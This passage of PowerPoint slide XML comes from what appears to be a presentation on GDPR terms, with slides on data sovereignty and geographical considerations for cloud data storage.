                    <a:pt x="2212133" y="694491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2192948" y="652658"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2172166" y="611741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149827" y="571782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2125971" y="532819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2100638" y="494894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2073868" y="458045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2045702" y="422314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2016178" y="387740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1985338" y="354364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1953220" y="322225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1919867" y="291363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1885316" y="261819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849609" y="233633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1812785" y="206844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1774885" y="181493"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1735948" y="157621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1696015" y="135266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655126" y="114469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1613320" y="95270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1570637" y="77710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1527119" y="61828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1482804" y="47664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1437733" y="35259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391945" y="24652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1345482" y="15884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1298382" y="8995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1250687" y="4024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202435" y="1012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1153668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2304" y="4852415"/>
              <a:ext cx="1344168" cy="1342643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4479416" y="1933193"/>
            <a:ext cx="75209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Following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some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important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terms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used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GDPR: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1785" y="306451"/>
            <a:ext cx="901001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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sovereignty</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Geographical</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Considerations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3288" y="760476"/>
            <a:ext cx="12490704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62682" y="1882292"/>
            <a:ext cx="11922760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58975" marR="5080" indent="-1946910">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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sovereignty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relates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jurisdiction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prohibits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limits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processing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storing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data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systems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do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not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physically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reside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within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authority.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0160" y="5791200"/>
            <a:ext cx="13696315" cy="1866900"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13696315" h="1866900">
                <a:moveTo>
                  <a:pt x="13385038" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="311150" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265173" y="3373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221290" y="13174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179982" y="28921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141731" y="50131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107017" y="76324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76324" y="107017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50131" y="141731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28921" y="179982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13174" y="221290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3373" y="265173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="311150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1555750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3373" y="1601726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13174" y="1645609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28921" y="1686917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="50131" y="1725168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76324" y="1759882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107017" y="1790575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141731" y="1816768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179982" y="1837978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221290" y="1853725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265173" y="1863526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311150" y="1866900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13385038" y="1866900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13431014" y="1863526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13474897" y="1853725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13516205" y="1837978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13554456" y="1816768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13589170" y="1790575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13619863" y="1759882"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13646056" y="1725168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13667266" y="1686917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13683013" y="1645609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13692814" y="1601726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13696188" y="1555750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13696188" y="311150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13692814" y="265173"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13683013" y="221290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13667266" y="179982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13646056" y="141731"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13619863" y="107017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13589170" y="76324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13554456" y="50131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13516205" y="28921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13474897" y="13174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13431014" y="3373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13385038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457071" y="6349471"/>
            <a:ext cx="13343255" cy="79756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00"/>
              </a:spcBef>
            </a:pP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sovereignty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may</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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necessitate</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>some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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>concessions</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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users'</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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part,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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>such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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>use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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>location-specific</a:t>
            </a:r>
            <a:endParaRPr sz="2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storage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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>sites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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>like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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>geographical</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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considerations.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736080" y="3262884"/>
            <a:ext cx="2783205" cy="2784475"/>
            <a:chOff x="6736080" y="3262884"/>
            <a:chExt cx="2783205" cy="2784475"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6736080" y="3262884"/>
              <a:ext cx="2783205" cy="2784475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2783204" h="2784475">
                  <a:moveTo>
                    <a:pt x="1391412" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1343576" y="807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296144" y="3211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249144" y="7187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202601" y="12709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156540" y="19750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110987" y="28284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065969" y="38287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021512" y="49731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977640" y="62590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934381" y="76840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891760" y="92454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849802" y="109406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808535" y="127670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767983" y="147220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728172" y="168031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689130" y="190076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650880" y="213330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613450" y="237766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576866" y="263359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541152" y="290082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506335" y="317910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472442" y="346817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439497" y="376778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407527" y="407765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376557" y="439753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346614" y="472716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317723" y="506629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289911" y="541465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263203" y="577199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237625" y="613804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213203" y="651255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189963" y="689525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167931" y="728589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147133" y="768421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127594" y="808995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109341" y="850284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92399" y="892264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76794" y="934908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62553" y="978190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49701" y="1022085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38263" y="1066566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28267" y="1111607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19738" y="1157183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12701" y="1203268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7183" y="1249835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209" y="1296859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806" y="1344314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1392174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="806" y="1440033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3209" y="1487488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7183" y="1534512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12701" y="1581079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19738" y="1627164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28267" y="1672740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38263" y="1717781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49701" y="1762262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62553" y="1806157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76794" y="1849439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92399" y="1892083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109341" y="1934063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127594" y="1975352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147133" y="2015926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167931" y="2055758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189963" y="2094822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213203" y="2133092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237625" y="2170543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263203" y="2207148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289911" y="2242882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317723" y="2277718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346614" y="2311631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376557" y="2344594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407527" y="2376582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439497" y="2407569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="472442" y="2437530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506335" y="2466437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541152" y="2494265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576866" y="2520988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613450" y="2546581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650880" y="2571017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="689130" y="2594271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728172" y="2616316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767983" y="2637127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="808535" y="2656677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849802" y="2674941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891760" y="2691893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="934381" y="2707507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977640" y="2721757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1021512" y="2734616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065969" y="2746060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1110987" y="2756063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1156540" y="2764597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202601" y="2771638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249144" y="2777160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1296144" y="2781136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343576" y="2783540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391412" y="2784347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439247" y="2783540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486679" y="2781136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533679" y="2777160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580222" y="2771638"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626283" y="2764597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671836" y="2756063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716854" y="2746060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761311" y="2734616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805183" y="2721757"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848442" y="2707507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891063" y="2691893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933021" y="2674941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974288" y="2656677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014840" y="2637127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054651" y="2616316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2093693" y="2594271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131943" y="2571017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169373" y="2546581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205957" y="2520988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241671" y="2494265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276488" y="2466437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2310381" y="2437530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343326" y="2407569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375296" y="2376582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406266" y="2344594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436209" y="2311631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465100" y="2277718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492912" y="2242882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519620" y="2207148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545198" y="2170543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2569620" y="2133092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592860" y="2094822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614892" y="2055758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635690" y="2015926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2655229" y="1975352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673482" y="1934063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690424" y="1892083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706029" y="1849439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2720270" y="1806157"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2733122" y="1762262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744560" y="1717781"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754556" y="1672740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2763085" y="1627164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770122" y="1581079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2775640" y="1534512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779614" y="1487488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782017" y="1440033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782824" y="1392174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782017" y="1344314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2779614" y="1296859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2775640" y="1249835"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2770122" y="1203268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2763085" y="1157183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2754556" y="1111607"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2744560" y="1066566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2733122" y="1022085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2720270" y="978190"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706029" y="934908"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2690424" y="892264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2673482" y="850284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2655229" y="808995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2635690" y="768421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614892" y="728589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2592860" y="689525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2569620" y="651255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545198" y="613804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2519620" y="577199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2492912" y="541465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2465100" y="506629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2436209" y="472716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2406266" y="439753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375296" y="407765"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343326" y="376778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2310381" y="346817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2276488" y="317910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2241671" y="290082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205957" y="263359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2169373" y="237766"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2131943" y="213330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2093693" y="190076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2054651" y="168031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014840" y="147220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974288" y="127670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1933021" y="109406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891063" y="92454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1848442" y="76840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1805183" y="62590"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761311" y="49731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716854" y="38287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1671836" y="28284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626283" y="19750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1580222" y="12709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1533679" y="7187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1486679" y="3211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1439247" y="807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391412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02652" y="4002024"/>
              <a:ext cx="1242059" cy="12405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1785" y="306451"/>
            <a:ext cx="901001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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data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100">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sovereignty</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Geographical</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Considerations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3288" y="760476"/>
            <a:ext cx="12490704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883533" y="1933193"/>
            <a:ext cx="848423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Geographic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access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requirements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fall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into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two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different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scenarios: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632829" y="3622928"/>
            <a:ext cx="3406140" cy="3036570"/>
            <a:chOff x="6632829" y="3622928"/>
            <a:chExt cx="3406140" cy="3036570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
